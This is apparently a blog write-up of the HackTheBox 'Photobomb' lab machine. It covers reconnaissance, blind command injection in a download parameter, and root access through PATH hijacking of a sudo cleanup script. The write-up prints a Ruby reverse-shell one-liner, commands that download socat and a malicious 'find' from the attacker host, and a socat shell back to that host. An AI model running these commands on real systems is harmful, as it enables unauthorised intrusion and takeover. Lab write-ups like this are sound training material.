Buy me a tea

Hackthebox - Photobomb

Nmap

┌──(kali㉿kali)-[~]
└─$ sudo nmap -T4 -sC -sV -O -Pn -p- 10.10.11.182                   
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-24 09:06 EST
Nmap scan report for 10.10.11.182
Host is up (0.028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
|   256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_  256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=12/24%OT=22%CT=1%CU=33794%PV=Y%DS=2%DC=I%G=Y%TM=63A707
OS:99%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST1
OS:1NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.92 seconds

  • We need to add a line to our /etc/hosts/ file like this 10.10.11.182 photobomb.htb

Port 80

  • Clicking on the link will open a prompt to login

  • Looking at the code we find this

function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
  }
}
window.onload = init;

  • Great we have credentials pH0t0:b0Mb! using these we are able to login

Gobuster

  • Nothing here. Most endpoints give this 404 page.

  • Here is the code of the page

</h2>
  <img src='http://127.0.0.1:4567/__sinatra__/404.png'>
  <div id="c">
    Try this:
    <pre>get &#x27;&#x2F;printers&#x27; do
  &quot;Hello World&quot;
end
</pre>
  </div>
</body>
</html>

  • We can note here the presence of Sinatra, and keep it aside for later.

  • Let's play a little with the download feature

  • Photobomb kinda reminds me about zipbomb (the attack) but we do not have an upload form at the moment.

  • It seems like we should focus on injection or path traversal vulnerabilities.

  • Let's use burp intruder for some fuzzing. Looking at the results, we get some interesting backtrace.

  • Trying out a wget in the filtype parameter in a server on my kali does something. Doing a whoami however won't work because we do not get the output as it is blind command injection.

  • We start a local webserver python3 -m http.server 80

  • Using this we could launch a reverse shell

  • Our usual bash commands are not successful.

  • This one in ruby looses the connection right away ruby -rsocket -e'f=TCPSocket.open("10.10.14.2",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

  • We are the user wizard. Let's grab the user flag

Privilege escalation

  • Let's get a better shell with a socat binary

  • wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O socat from your kali

  • Then we put on our python web server python3 -m http.server 80

  • We also set up a listener with socat

socat file:`tty`,raw,echo=0 tcp-listen:4445

Then we go to a writable directory wget http://10.10.14.2/socat

  • chmod +x socat

  • ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.2:4445`

Linepeas

  • We take linpeas and launch it

  • Interesting input to investigate further

*/5 * * * * sudo /opt/cleanup.sh

  • There is an interesting cronjob.

  • Here is the content of /opt/cleanup.sh

#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

  • Also we can set the env for /opt/cleanup.sh and run it without the root password. See sudo -l result here

wizard@photobomb:~/photobomb$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

  • The cleanup script uses the find command. We could make our own find command and change the path.

INSIDER TIP: Don't do like me do not forget to chmod +x your malicious find script... -_-'

  • So here is the process

    • Create your own malicious find command. Here is mine (it will lauch root shell but you could also make a reverse shell for example)

    #!/bin/bash
bash

    • Get it in your target (you can also write your script from the target with echo) wget http://10.10.14.2/find

    • Make your script executable chmod +x find

    • Set the path sudo PATH=/home/wizard/photobomb:$PATH /opt/cleanup.sh this way the find command will be fetch where you want here in the photobomb folder

    • You should be root in a very few seconds

We can grab the root flag

PreviousHackthebox - PaperNextHackthebox - Poison

Last updated